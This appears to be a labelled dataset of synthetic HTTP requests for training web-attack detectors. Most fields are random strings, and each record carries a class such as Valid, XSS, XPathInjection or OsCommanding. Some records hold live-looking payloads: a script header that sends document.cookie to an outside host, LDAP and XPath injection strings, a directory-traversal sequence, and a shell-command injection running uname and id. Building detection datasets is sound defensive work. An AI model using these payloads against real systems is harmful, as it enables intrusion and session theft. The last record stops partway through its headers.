GET /ok6ooS/H@MexecFU_Y.cWf/.yovUMjnDEURgS/iimaiEi4iynSumpirh/ab_dHt.sylt57vcpxu/0HScEqVr7eDxvkxkvpP/X1Yz.html?epUVD.WLP-QF=08896&pSehcN6=nvsiesqhtdurieott&st=formhNetceeabtlrw%3F&qed=3662&lt5eh=2156015772&uCwoNiu=objectErt&o3e=uebetween&wfpl=olotmi0st5neit&yenTnq6aniwep=ohnjv1taain&xnzaiuruakhnu=907&disezyxh9E=ioeeautoexeca HTTP/1.0
Host: www.nttsDsg.st:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.7, identity, compress, gzip;q=0.2
Accept-Language: *
Cache-Control: min-fresh=337
Client-ip: 12.17.95.95
Cookie: vClnodeL= tetFi;._IU=);T3W1V=a0nihd4;miesiaus3rce=rj9h3QRqc
Cookie2: $Version="28"
Date: Sat, 26 Apr 08 07:29:24 UTC
ETag: "LacjLBXku.K2a0kE9RB"
Expect: raried
From: dren@Ttoersyr6.com
If-Modified-Since: Fri, 07 Dec 07 08:51:36 GMT
If-Unmodified-Since: Fri, 14 Aug 09 14:29:14 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 01 Oct 09 15:56:32 UTC
Max-Forwards: 0
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic aWFydHA6ZmVjaWM=
Authorization: 0oitr oaVg=n4Wm
Range: -212,11-,-0
Referer: http://www.imt9f.ch/dE1ea/0oIsuod/eMqon/ar9astq/b0hgDMa.msf
TE: trailers,deflate;q=0.0
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.4 (compatible; uf7h; Open BSD i386; hdxEe)
UA-CPU: PowerPC
UA-Disp: 1342,370,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8724x0388
Via: 6.4 17.74.34.133, 8.9 107.172.180.50, HTTP/4.5 245.221.253.150
Transfer-Encoding: deflate
Upgrade: sdqs/1.2, otap/2.3, suO/8.6, t03/1.8
Warning: 503 www.atcO.png "aniinsIheewgiof" 
X-Forwarded-For: 223.155.250.69
X-Serial-Number: 42920569636252963929
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22103
Start - Id: 46613
class: XSS
GET /d2zmk1E870zw@PVrjkuZ/maieetrdtcsth3dA.asp?aHtesknq=hHbinme&1seedEh=fdgs&t9tbb9e2aosw=76120&ialemksr6j=742&kGDLS@7.IrN=8022&djRI6xmeeefiih=aUalaSetfmidlAee&fTww3bfioek=lnhhmochar%3D%3Asmsystemn9er HTTP/1.0
Host: www.tjyrl.org
Connection: airLc
Accept: audio/basic, video/*
Accept-Charset: *
Accept-Encoding: <script>alert   (edtusuiszIaa.yahtxK)</script  >
Accept-Language: [\xC0][\xBC]script   >[document.location.replace    ('http://www.enerti.com/cgi-bin/teinri.cgi'+document.cookie);][\xC0][\xBC]/script    >
Cache-Control: oeaen0sl=srztsg
Client-ip: 58.236.152.142
Cookie: nt7=se
Cookie2: $Version="8"
Date: Thu, 28 Jan 10 20:56:40 CET
ETag: "Ux4OQ9o1GIy2X_88aSM"
Expect: ojtqh2=jrftdNh;ooree
From: fa4oar@deOvi.uk
If-Modified-Since: Tue, 25 Apr 06 22:09:47 CET
If-Unmodified-Since: Tue, 05 Jul 05 21:03:42 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 728
MIME-Version: 1.9
Pragma: l='ritua5aO'
Proxy-Authorization: Digest username="6LlGdn"
Authorization: nhercq enHtt5=oun2
Range: 7283-8
Referer: /to9eTd8t/yam5.asmx
TE: chunked,gzip,trailers
Trailer: Host
User-Agent: i2ayb/2.6
UA-CPU: PowerPC
UA-Disp: 7714,181,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 950x529
Via: FTP/1.5 9.64.72.114, 5.6 www.am7bmr.png
Transfer-Encoding: gzip
Upgrade: 1ssnt/2.7, Necil/0.4
Warning: 045 www.g6oeJmh.shtml "HEkdlTofnTpdehenjd" 
X-Forwarded-For: 245.134.55.175
X-Serial-Number: 43388399
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46613
Start - Id: 26835
class: Valid
GET /tcii/iZmeov@DVna/Cdeleteynph-CSmetaBh/oasUqp_8QUUgrM/eesgbokba6dhdlo/Teaf/igsi527qrkOLjGZXo/rpnhhg2loanoiw/vF2VYx9mQiWFlDHBNQx6/r1RP72LwDFr.png? HTTP/1.1
Host: 88.235.14.80
Connection: close
Accept: text/*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, deflate;q=0.9, gzip, deflate
Accept-Language: rzDl-frsbna;q=0.6, s-mtr, 7-iha;q=0.6, 3eefi-ey3;q=0.6
Cache-Control: only-if-cached
Client-ip: 93.2.230.55
Cookie: oEq=147926;steeRsrteekw6dS=zwrtEs2s5rcmis;gnht6elbsnorewd=g5htt;rnsaeonthta=r2fecgandnhimetcstmf
Cookie2: $Version="747"
Date: Sun, 15 Feb 09 17:43:07 UTC
ETag: W/"7oGiPZehxkceqqQ"
Expect: narnunp=svtEad
From: rtxpR@sktrehlr6.cz
If-Modified-Since: Sun, 15 Apr 07 02:06:33 CET
If-Unmodified-Since: Sat, 31 Mar 07 16:25:13 GMT
If-Match: "gpCReleWricwoXq@9"
If-None-Match: "t17rJFZCF0J0sj9fjh"
If-Range: Sat, 20 Aug 05 18:35:18 GMT
Max-Forwards: 2055
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: NTLM ZnVuc05kbGRnSGVudmF0YjdzYmhsbmVhYXFlbTFudHRvbGpibWxrbHpwdG1FZWk=
Authorization: Basic amxlbDZlOnJvdnM=
Range: -6214
Referer: /sanzs/hucdn/asshe4/ernn.php3
TE: gzip;q=0.3,deflate;q=0.5,chunked;q=0.3
Trailer: Connection
User-Agent: Mozilla/7.8 (compatible; tahnish; Windows NT; yzea6p)
UA-CPU: StrongARM
UA-Disp: 5606,5500,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9604x4951
Via: 7.6 www.ytsr.tiff:19
Transfer-Encoding: gzip
Upgrade: advoos/2.4, 1dhv/7.1
Warning: 341 www.nnmq.png "nnserre1png8hew8e" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 333154589
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26835
Start - Id: 37485
class: LdapInjection
GET /3aelobdrmcuo1/.TVaQT/agocGFja5HnXfhVnj/tY/o-01-/o9au/satoHhedrbnt9lhedt/samMSipsm2@m@qscript/pseuo.cgi?_JkwHC=z4vAo5iQ&polXnltp2rle=nlEt&8rnda=tsGi+aaN&oavdteytesa=e%3AotssmqnT4Rrlh&WXVQb9insert=0563847&pa3ei=934715&0srtdeadsGtb5u=36199412&ea1LSEtiA8=ee9xF&r0esggr=zthfohliwa&jEOvarzB_Ongmp=t9aotnn HTTP/1.1
Host: www.rvdegzo.net:762
Connection: close
Accept: text/html;q=0.5
Accept-Charset: iso-2022-jp;q=0.5, iso-8859-8, iso-8859-15;q=0.5, utf-8
Accept-Encoding: *
Accept-Language: iT-Dnr2r;q=0.9, obnev2a9-iqk, edlzuaa-quImaz, rIbBs-ymus96h, S4oe2P-vufaqq
Cache-Control: min-fresh=053
Client-ip: 13.68.217.115
Cookie: ebjdsTrr=ca ;apsnrpilf2=jrtt2ro;4oanpeamwimsnaw=99162;fsOXURJ4idP=")(targetfilter=(o=NetscapeRoot));se1caeh7swtEsto=umbreo;ii=ehtne
Cookie2: $Version="597"
Date: Sun, 19 Aug 07 05:29:38 UTC
ETag: W/"tp4XUAftcoiPu@mzQSS"
Expect: Htiitrie=tyeg
From: aekr@ienrc.org
If-Modified-Since: Fri, 03 Dec 04 16:50:52 UTC
If-Unmodified-Since: Fri, 21 Dec 07 16:48:58 GMT
If-Match: "FP4h.F35u021y2WVzA"
If-None-Match: *
If-Range: Tue, 06 Jun 06 06:44:19 CET
Max-Forwards: 2
MIME-Version: 8.8
Pragma: ma8oo2='ta8pc6n'
Proxy-Authorization: Digest uri=http://www.nRrndret.com/rsidruI/hph7shpn/1ttdtr07/2rMu/ylhd0.tiff
Authorization: FEei 0cauE=ju5dnkki
Referer: http://www.fp5ihe.net/akcektgt.asmx
Trailer: Warning
User-Agent: Mozilla/9.1 (Machintosh; U; PPC Mac OS X 2.6; el-el; rv:9.9.0) Gecko/22802335
UA-Disp: 3450,3605,32
UA-OS: Linux
Via: FTP/6.3 www.yuns.shtml, FTP/2.6 176.218.13.159, nfbEae/2.2 227.39.225.192
Transfer-Encoding: gzip
Upgrade: mkJ6/3.7, Ia8re/9.0
Warning: 467 100.224.144.169 "tnaiAtneptehnz6ndIrt" "Sun, 07 Dec 08 02:23:15 CET"
X-Forwarded-For: 139.237.65.5
X-Serial-Number: 19975939
----: -----------------------

null

End - Id: 37485
Start - Id: 44871
class: PathTransversal
GET /saeh5neffiem/tQU28fT9ooDhiJ/NnaTiAstealt/s5OgwSbp@3B/hAmwherewaRJv/ebgvsetysbUabccsrqc/moslneletamnntxi8/eRSTO8Tk7aORYGr/n4sK6FLyTsD9tTB.O/hNRskUuqibU4XDI.jpeg?ydnpitsxedo=.%2F..%2F.%2F..%2F.%2F..%2F.%2F..%2F&be=5478973355&ov1Up_T6Btp=%7EtTdtzmto- HTTP/1.1
Host: 10.105.11.134
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: GSao-ReuaI;q=0.5, co-sg2;q=0.2
Cache-Control: min-fresh=51791
Client-ip: 32.25.74.7
Cookie: 1ryurSd5=yn;i7gejo7aea=lxaeloptt7p4sa;si7fqus=it3e nyscriptm G;wornsicaegp=na-=nvme'4sock_stream0iframea]etwh[;mi9o8R=633598
Cookie2: $Version="6"
Date: Thu, 16 Nov 06 12:59:51 CET
ETag: "1zhRIGqs9bhrirWiAR"
Expect: ritRee
From: crrs@n6en.net
If-Modified-Since: Sat, 27 Mar 04 12:51:55 GMT
If-Unmodified-Since: Thu, 30 Aug 07 14:33:50 CET
If-Match: *
If-None-Match: "UunXHK8cxJ-@RnFOhpj"
If-Range: Mon, 17 Nov 08 04:22:20 CET
Max-Forwards: 2139
MIME-Version: 5.3
Pragma: ski=lda
Proxy-Authorization: NTLM bmhJZUFldG5uY2FVdGVFdXNlU1Zpb1llcUZ0bWRkQ0F0YWVlZml5Z2Vv
Authorization: NTLM Y2M4dGFpZWxGcWNlZnNvb3RvZWFnZGF3ZnJieW9ycm95aW1jaXM=
Range: 165-47102,-98
Referer: /onri67/tDerl/nb3a.tiff
TE: trailers
Trailer: User-Agent
User-Agent: botl2/7.7.1.7
UA-CPU: PowerPC
UA-Disp: 229,303,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 458x842
Via: FTP/1.4 www.amNbme.css, 4.0 44.78.128.66, 7.3 168.252.65.116
Transfer-Encoding: identity
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 279429
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44871
Start - Id: 49129
class: XPathInjection
GET /1@i/nCMSc8rMRIgQEeMJ/enHsd.js?aset=35&ho=65010&uFudIgwxXmn=tFI%40-GF&sranusreesq=aeyot3%27++++or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or+%27luNrn%27++%3D++%27&IuEtmnsirehotl=9cr&ysN34k-XZX=9828&A4AlhtLelosnaa=89&epomtoa=ftdn&mkBx@UFF=oNwqiqchMRm&pel=274&Itluieowtwnxn=2931&iiet=ckEt HTTP/1.1
Host: www.ipdAa7.gov
Connection: bplC
Accept: */*;q=0.7
Accept-Charset: windows-1258, x-mac-roman;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=23530
Client-ip: 64.55.189.239
Cookie: qeTmhstd=tX@;uxq8cB6=hF.KIUbQ;ltaatmi8edaueup=453;ttc0=83048532;nosTntserhDyN=mros8~h9dj)r)rs;eairbOnfyhv=8353243
Cookie2: $Version="35"
Date: Sat, 10 Apr 10 23:02:02 UTC
ETag: W/"Tvi9KhEHOu0-YyM"
Expect: eqva=geaerd;skie9
From: NktwIe@earsOsuo.org
If-Modified-Since: Sun, 08 Jan 06 05:00:50 GMT
If-Unmodified-Since: Sun, 04 Sep 05 03:48:43 CET
If-Match: *
If-None-Match: "3LkXk@fqvVjnJeA_V"
If-Range: *
Max-Forwards: 1
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic YWFpZDpkYW90YW5q
Authorization: Digest algorithm=iUsSH
Range: 137110-8612,-4,90364-3
Referer: /N4ut/o4brenze/sr4tao.mpeg
TE: trailers
Trailer: Host
User-Agent: mj.3y9rL http://www.Taavesa.com
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 468x973
Via: 3.0 www.oeTuz.tiff
Transfer-Encoding: deflate
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 387 www.5rttc.html "iatlob" 
X-Forwarded-For: 91.195.205.35
X-Serial-Number: 017399203750342
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49129
Start - Id: 35627
class: XPathInjection
GET /7-SxmE_17v8e1G5l/t__cIcMvyILwp4/a35aXALx6XXHYCu3/c-yk8zyOPH6kpDTs960t/oo0dm/sTomnoiiiretnmromo/AmochaniJcNthVbCBZ/rnStsoltnoagcu.htm?i6hri=Xocn0ldh&ssno8eromdqu1e=lmelovnmhyets&iamdbptse1=qoo&ehoe=eagnia+4child%40a5Hinput&aaryrnbtnollN=s5odaloeeeurmpe&bR1replace24=9++++or+++++en%2Ftg%2Feiet%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D0%5D++++or++1860%3D&ezaraodu=uWap7Oj&0det=eca&reayat=elRacceptvepasswdshutdown&xolntwadwdN6=sp%3B&i7=%27dkmhe%29a HTTP/1.1
Host: 197.141.203.165:62014
Connection: tor4Dt0n
Accept: text/*;q=0.8, video/mpeg, audio/basic
Accept-Charset: *;q=0.3
Accept-Encoding: compress, compress, compress;q=0.3
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 108.171.74.43
Cookie: B9eiFyutj=oe/d+j2eey1trI 
Cookie2: $Version="6"
Date: Sun, 26 Oct 08 22:08:46 GMT
ETag: W/"XbI56jsXrDoOoTOo"
Expect: 100-continue
From: yehNodot@eblEqjJp.ch
If-Modified-Since: Sun, 02 Jul 06 22:53:33 CET
If-Unmodified-Since: Thu, 24 Jan 08 02:35:59 UTC
If-Match: "euWw85SP2wjA0ciU"
If-None-Match: *
If-Range: "z285ETIARPyp0Sb0Hn.t"
Max-Forwards: 9
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: 0Sri sdeo=1cleT9
Range: 7528-,849-
Referer: http://www.isgAtaE.uk/itmt/rttei2/ooIi8/nhpydnut/sas6.sh
TE: trailers,chunked;q=0.6,trailers
Trailer: Upgrade
User-Agent: Mozilla/4.6 (X11; U; Linux i386 3.5; el-nr; rv:8.1.2) Gecko/35669705
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 817x128
Via: HTTP/0.9 www.hzpo.shtml
Transfer-Encoding: gzip
Upgrade: natE8s/5.8
Warning: 986 www.rBnsrcl.html "5cdarlosaE" 
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 65275952070459353
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35627
Start - Id: 49940
class: XPathInjection
GET /92zJkB/snpe/0udn0H6heiedtln/30fncaK.GtYinput/b4k-/n6OupXVZ/eI-388AKA/ezsHurii8ot9iwIsco/nUhuZc_xvG/mperloKuH/gt.aspx?snuptag2cr=twp-dq&nn=1+or++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or++79442%3D&d1rosA=8e&1s1nOOSrhthA=t&htpassOzJiW1IscriptA=sopositionerj%2Benodeh&tiwnhagrurebxu=58609694&wgUiNL1bcXc=527&HHunionz=lN%2B-aheg&fsNlr4toew=eIo_DJotop&peno2an=mC4UUd_k-&s5EiId6olhbDt=uisibody HTTP/1.1
Host: www.mcoThcwbns.st
Connection: keep-alive
Accept: text/*, application/*;q=0.9, image/jpeg;q=0.3
Accept-Charset: cp-950, iso-8859-5, x-mac-chinesetrad, x-mac-chinesetrad;q=0.7, cp-936
Accept-Encoding: gzip;q=0.4, deflate, gzip;q=0.2, compress, deflate
Accept-Language: eQrtr7e-hNs9rh;q=0.5, 1t8teth-o85llElz, e1-aur;q=0.7
Cache-Control: only-if-cached
Client-ip: 69.149.110.120
Cookie: hogd=Rsssehmrr7reuonb;Eiooasy8aOM=h8lcozton5Noaaemp
Cookie2: $Version="027"
Date: Sat, 03 May 08 08:36:20 CET
ETag: W/"i-WIg.Pxydq@40bwD"
Expect: 100-continue
From: gxo4Nam@arrt3.it
If-Modified-Since: Mon, 23 Aug 04 03:36:16 CET
If-Unmodified-Since: Thu, 19 Apr 07 19:43:28 CET
If-Match: *
If-None-Match: "cudpx8fJKEO6l07"
If-Range: Wed, 17 Jun 09 19:08:31 GMT
Max-Forwards: 563
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM bmhlc3JhZmx0ZHFibzVlY2FvZm1qczNUZW5hbGFObXdzbg==
Range: 33-0
Referer: /aaeeet/I9ihu/ca9snd/msoeq.wav
TE: deflate,trailers,gzip
Trailer: Via
User-Agent: Ensre23jt3
UA-CPU: x86
UA-Disp: 4764,9289,32
UA-OS: Linux
UA-Pixels: 299x2707
Via: HTTP/6.3 www.6Vaul.htm
Transfer-Encoding: vTas; oeeMruy=weNwsn
Upgrade: oepjtw/9.0, eribt/2.4, enN/6.1
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 84157643689
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49940
Start - Id: 21039
class: Valid
GET /quAcat.cX.d/fuwR37io5UxZt032wfp/n5ntrs/sk6E9a/usdV-vciknE4xVt/e71itOPPg8x0FBmu@Ffm/Wernexp_YoformR.tVi/fRkt9@2C8l3/n0sWws86aYrX/5T-9D1.dBuJ.jpeg?ewapxqrrrwOni=aerErwpassthru&tggaietlyoEowd=caarp&9hieyhy=oleinp&aheteHwsssfPn=56KNto&e8Des=o&ItWrb5=abdoIbiniuyohtacces%2F+sEhegNi&1T-TinsertVP@hT=enE&wV2r6cyLU7=tio&eoaDrtpcrWiet=5&thoEesahe=nMzyR36o&eleanhebfe3e=T&OpositionRYfV8ZtW=l9ZtYWBXB&aptuNeosyt5=47&4eoS4esmwota=onneH39B HTTP/1.0
Host: www.trTnHlOu.fr
Connection: close
Accept: image/png, audio/x-wav
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: bEMcrsx-hrOtoD, esafe-eh;q=0.6, ych-9, swhIt-tV, qukn-iS;q=0.9
Cache-Control: min-fresh=409
Client-ip: 189.5.86.196
Cookie: eaotp=0c no
Cookie2: $Version="870"
Date: Mon, 30 Jul 07 04:06:33 GMT
ETag: "G3UB5DhC4TwNiHQQVH"
Expect: epese=5Pnfa
From: hrtiet@tsotaco.it
If-Modified-Since: Sun, 27 Mar 05 22:08:01 UTC
If-Unmodified-Since: Tue, 01 Nov 05 03:34:52 UTC
If-Match: *
If-None-Match: "kMcPV28NIVevp6Jmk4@C"
If-Range: Thu, 17 Dec 09 17:02:24 UTC
Max-Forwards: 2
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic b2h0cGVlbDpsbHFzZGlt
Authorization: NTLM czluZWVzdFJhZFRiYm9vbm5paWlmZWVrbWh0b1Rhd29idGc3eW9uZXNkV2xpbnJp
Range: 98-,136-
Referer: /TroozC1/esh5.php4
TE: trailers,trailers,chunked;q=0.4
Trailer: If-Modified-Since
User-Agent: haliguna (mlNw6Il; d9xYTmEEfn)
UA-CPU: 68000
UA-Disp: 1375,066,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 985x390
Via: FTP/7.4 www.hilta.png, 9.6 www.ziten.png, 5.7 176.134.64.65
Transfer-Encoding: gzip
Upgrade: stlms2/7.1
Warning: 623 98.104.50.147 "rrdkqSloae" 
X-Forwarded-For: 120.235.145.125
X-Serial-Number: 650978480578430420
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21039
Start - Id: 43438
class: OsCommanding
GET /eneeT/efA5ORIs.Fz58wuzB4a/lgb2oDtsa7tvi2a/oi8aaItosiesehlors/3isrpfyyTelad1oenrf/aVnaR@Ewonwj6M/stncggqZpbdJ-wUeQv9T.dll?UYYK1yexec=+++%3B+++++echo++++%3Bw+++%3B++uname+++-a++++%3B+id&n4tegse=00&nei=6604829 HTTP/1.0
Host: www.oyhdxoeqjd.biz:80
Connection: keep-alive
Accept: audio/x-wav;q=0.4
Accept-Charset: windows-1252, euc-cn, windows-1251;q=0.4, iso-8859-1;q=0.8, x-mac-greek;q=0.2
Accept-Encoding: 
Accept-Language: bi3-c;q=0.8, ene-8leriaw
Cache-Control: 14cwol=r
Client-ip: 43.84.88.74
Cookie: ewn=we;26edjmS=57692;ur8neiaeiodtzw=rformhg 8lebt9aiym
Cookie2: $Version="4"
Date: Fri, 23 Apr 04 17:19:42 UTC
ETag: W/"s9u-oZzMeEZFqxQxDc3j"
Expect: 100-continue
From: satt@ee2io.st
If-Modified-Since: Sun, 19 Feb 06 18:23:53 GMT
If-Unmodified-Since: Wed, 01 Mar 06 01:15:36 CET
If-Match: *
If-None-Match: "bLyposXZ74BS7lpBB"
If-Range: Tue, 12 Jan 10 21:20:43 CET
Max-Forwards: 2929
MIME-Version: 4.0
Pragma: yst='tDroi'
Proxy-Authorization: Basic b3pzbndsbzptaWg5cW9k
Authorization: Basic c0c1UnBXOmdkaWI=
Range: 89-,6-,2-
Referer: http://www.ermarr.net/4aems/te3snea1/gyl4aw1i/temn.tiff
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.8 (compatible; MSIE 8.3; Solaris; ndcic; w42cpTGsl)
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 801x1629
Via: FTP/3.3 61.141.171.215
Transfer-Encoding: gzip
Upgrade: nb0Mi/9.5, daegas/8.7, tiso/6.9, rtN/5.7
Warning: 641 202.173.246.46 "aerLri" "Tue, 03 Aug 04 10:59:47 GMT"
X-Forwarded-For: 228.244.125.120
X-Serial-Number: 56802452036751769
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43438
Start - Id: 48390
class: XPathInjection
GET /0ddiv49position2Iv0ftpH/o4aDJ1/rcpF0admin/rY/7oOWbwhere/ue/d7UR/ee7e2ywrn6tdhInrtlh/kT9cspnDwEaero/j-ARdSAIgebj@Q/s7hoseaarcnizc/15moaonysi.php3?prre=otmdlbinJegeinpute&HodnTcirdc9IC=d%5Cl+%25Oc4elourcHms&drRoctFe=4rdwcwaeesai1ehuhl&fcfua=saszgswbroEphE&8.IK=382715654&noie=ebcndwfndf1tAntmed HTTP/1.0
Host: 4.77.135.168
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, gzip, deflate
Accept-Language: asayep-5, mIxoses-m4tpIsor, yrhltd-tar
Cache-Control: no-cache
Client-ip: 80.72.57.200
Cookie: inserth9LUuC=qsna;debnnm3fea=(i < count(tsthp/child::text())     and j     <  count(ANt/child::comment())  and     k  <     count(dpeono/child::*) )
Cookie2: $Version="67"
Date: Mon, 11 Oct 04 14:43:16 CET
ETag: W/"nVZ3.AfQ@YEmVw2x3X4"
Expect: zlhba
From: n56he@s5yangs.gov
If-Modified-Since: Sat, 25 Nov 06 07:38:09 GMT
If-Unmodified-Since: Tue, 01 Apr 08 06:34:06 CET
If-Match: *
If-None-Match: *
If-Range: "T9nlCoHesKkBXDU"
Max-Forwards: 4004
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Basic YWttY29hajp0b2Zh
Authorization: Digest response="6fD2b15FD50E1ccD5e5d7edf43eb89AF"
Range: 6-4347,22520-
Referer: /noibgi/dzeGrnns/qhee/ebseRsee.doc
TE: deflate;q=0.9,gzip;q=0.3,deflate;q=0.2
Trailer: Max-Forwards
User-Agent: Mozilla/4.9 (Windows; U; Win 9x 6.9; rw-ih; rv:3.1.8) Gecko/43499308
UA-CPU: Sparc
UA-Disp: 574,086,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 128x9065
Via: FTP/8.8 www.arrt.htm:5, o53/9.1 84.143.77.184, HTTP/2.9 www.rloadfn.css:3
Transfer-Encoding: deflate
Upgrade: drca/7.4, zeot/7.9, sjnA/1.3, wIv/9.0
Warning: 216 186.83.235.10:55267 "2nxkEalywutount" 
X-Serial-Number: 631643747373
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48390
Start - Id: 32704
class: Valid
PUT /54/9AM2Hz/0sFtmp.htm? HTTP/1.0
Content-Length: 229
Content-Language: SrcatT,hee
Content-Encoding: identity
Content-Location: /ptoadgbh/7R1q90/nmiiomo/qecnoiSf.jpeg
Content-MD5: aGN5aGlpdEVkbnNubnRlaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 20 Mar 06 10:49:13 CET
Last-Modified: Fri, 23 Jan 04 18:03:51 CET
Host: 118.1.140.71
Connection: aoar
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: tis7=onPthue4
Client-ip: 243.82.120.139
Cookie: lrbiefbgfcsZnn3=tQqrwZkoo;hopenzKreplace=tUb;Dtoceid1=tvkXRU9@FY
Cookie2: $Version="90"
Date: Sun, 02 May 10 22:58:16 UTC
ETag: W/"Z-E63Eov10fSRQJm"
Expect: 100-continue
From: AceeLtaw@3emgHtiy.it
If-Modified-Since: Sun, 24 Oct 04 20:46:00 UTC
If-Unmodified-Since: Thu, 22 Jun 06 18:52:41 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 18 May 04 07:52:34 GMT
Max-Forwards: 9187
MIME-Version: 9.9
Pragma: srmmsd='a9oil'
Proxy-Authorization: Basic b250d015b3Q6aWdkZmVm
Authorization: 5sw8 xroouN=Txye
Range: 08-42,29612-1
Referer: http://dlstk.net/ossac.dll
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/8.1 (X11; U; Linux i386 9.9; 1i-se; rv:9.1.2) Gecko/46915664
UA-CPU: MIPS
UA-Disp: 6104,859,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1210x8264
Via: HTTP/5.2 www.3eqEpe.jpg:5480, 3.7 www.dT01.css, 1.9 204.247.143.87
Transfer-Encoding: deflate
Upgrade: ja8/1.0, ico/1.0, lvnl/6.3, 0uenmq/8.4, eye/7.0
Warning: 536 www.e3etdet.jpeg "noeenTmxyfTphsgpke" "Sat, 01 Oct 05 15:35:27 CET"
X-Forwarded-For: 67.157.122.212
X-Serial-Number: 590618
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

woni9hbgdsokl=4707&rjcuou=lroZrr93p&UhfHiana2n=anehfmj&eileeh=uidaelcaHmnynWnSe&shesgetdle6thse=i3sAh&rArbllNiedtl=1525256&dpxUy=4235530&ie=tAPo&G8V6WlH=onha d+Aselect=bs&nnunecuiE=oa2&mreetdtvKl5t=lRLYo9zO&j1naE=plseeysinloo

End - Id: 32704
Start - Id: 3889
class: Valid
PUT /evseMghnf/1rumabatisttsye/btydgrehnydno/RotEdbvgtz/enVUis2YTKoBTwOW/2EF@J95R1Cu/aYY88IlTM0Ptxc7oq7I1/n_tOr0d@gZtKb3r1SyC/nS/epenose0lo/sPo06SUZJH0.mdb? HTTP/1.0
Content-Length: 119
Content-Language: seats8se,dNunTn
Content-Encoding: gzip
Content-Location: http://tglmotcn.be/elrec.php3
Content-MD5: cTdlc2xzZHR4YWRlaGlFbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 Jul 06 20:50:31 GMT
Last-Modified: Wed, 29 Dec 04 13:40:49 UTC
Host: 167.177.82.165
Connection: keep-alive
Accept: image/*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 219.253.49.239
Cookie: Z8mthncTVSZ=wRathsLDagaeelzhQ;TQmbot=2566641776;rmeuir=787
Cookie2: $Version="32"
Date: Mon, 22 Jun 09 09:34:34 UTC
ETag: "YHx9wKYTrm8.fKBjo"
Expect: irpempa
From: sEaatM@keea.biz
If-Modified-Since: Thu, 08 Mar 07 16:41:41 UTC
If-Unmodified-Since: Wed, 26 Mar 08 04:35:11 UTC
If-Match: *
If-None-Match: *
If-Range: "DIY@N60LRgK3rv8"
Max-Forwards: 62
MIME-Version: 1.5
